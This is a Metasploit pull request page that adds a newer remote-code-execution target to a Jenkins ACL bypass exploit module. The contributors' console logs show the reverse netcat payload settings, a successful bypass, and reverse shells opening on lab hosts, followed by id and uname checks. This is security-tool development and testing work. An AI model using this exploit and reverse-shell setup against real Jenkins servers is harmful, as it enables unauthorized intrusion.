
Add newer RCE vector to Jenkins ACL bypass exploit #11864

Merged
merged 5 commits into from May 23, 2019

3 participants
@wvu-r7
Contributor

commented May 21, 2019

msf5 exploit(multi/http/jenkins_metaprogramming) > options

Module options (exploit/multi/http/jenkins_metaprogramming):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.28.128.3     yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /jenkins         yes       Base path to Jenkins
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.28.128.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix In-Memory


msf5 exploit(multi/http/jenkins_metaprogramming) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Jenkins 2.137 detected
[+] Jenkins 2.137 is a supported target
[+] ACL bypass successful
[*] Configuring Unix In-Memory target
[*] Sending Jenkins and Groovy go-go-gadgets
[*] Command shell session 1 opened (172.28.128.1:4444 -> 172.28.128.3:45020) at 2019-05-21 15:13:26 -0500

id
uid=112(tomcat8) gid=117(tomcat8) groups=117(tomcat8)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

#11466

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch 2 times, most recently from d60790f to ebe2bc6 May 22, 2019

@jrobles-r7 jrobles-r7 self-assigned this May 22, 2019

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from 475ef69 to 0594518 May 22, 2019

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/jenkins branch from 0594518 to 801af31 May 22, 2019

@jrobles-r7


Contributor

commented May 23, 2019

@wvu-r7 LGTM. I did run into the Mdm::Workspace issue that you mentioned previously when using the Java Dropper, but that is a separate issue from these changes.

msf5 exploit(multi/http/jenkins_metaprogramming) > exploit

[*] Started reverse TCP handler on 172.22.222.136:8443 
[*] Configuring Unix In-Memory target
[*] Sending Jenkins and Groovy go-go-gadgets
[*] Command shell session 1 opened (172.22.222.136:8443 -> 172.22.222.112:41071) at 2019-05-23 06:24:17 -0500

uname -a
Linux 8ac8c4e5a351 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 GNU/Linux
whoami
jenkins

@jrobles-r7 jrobles-r7 merged commit 801af31 into rapid7:master May 23, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

jrobles-r7 added a commit that referenced this pull request May 23, 2019

msjenkins-r7 added a commit that referenced this pull request May 23, 2019

@jrobles-r7


Contributor

commented May 23, 2019

Release Notes

This updates the jenkins_metaprogramming exploit module with an additional target that uses the GroovyShell.parse entry point for command execution.

@wvu-r7


Contributor Author

commented May 23, 2019

Awesome, thanks!

@wvu-r7 wvu-r7 deleted the wvu-r7:feature/jenkins branch May 23, 2019

@wvu-r7


Contributor Author

commented May 23, 2019

Failure to stage Java Meterpreter fixed in #11871.
